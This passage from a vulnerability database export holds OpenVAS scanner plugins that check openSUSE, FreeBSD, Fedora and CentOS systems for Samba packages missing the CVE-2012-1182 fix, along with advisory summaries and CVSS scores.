\"2012:0508_1\");\n script_name(\"SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", 
rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", 
rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:46", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: samba34", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-04-12T00:00:00", "id": "OPENVAS:71279", "href": "http://plugins.openvas.org/nasl.php?oid=71279", "sourceData": "#\n#VID baf37cd2-8351-11e1-894e-00215c6a37bb\n# OpenVAS Vulnerability 
Test\n# $\n# Description: Auto generated from VID baf37cd2-8351-11e1-894e-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n samba34\n samba35\n samba36\n\nCVE-2012-1182\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(71279);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 5940 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-12 11:02:05 +0200 (Wed, 12 Apr 2017) 
$\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: samba34\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"samba34\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.16\")<0) {\n txt += \"Package samba34 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nbver = portver(pkg:\"samba35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5\")>0 && revcomp(a:bver, b:\"3.5.14\")<0) {\n txt += \"Package samba35 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nbver = portver(pkg:\"samba36\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6\")>0 && revcomp(a:bver, b:\"3.6.4\")<0) {\n txt += \"Package samba36 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6382", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864238", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6382\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864238\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-17 10:31:56 +0530 (Thu, 17 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6382\");\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"samba4 on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~38.alpha16.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881194", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or 
modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881194\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the 
updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:50", "description": "The remote host is missing an update for the 'samba4' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for samba4 CESA-2013:0506 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881650", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2013:0506 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
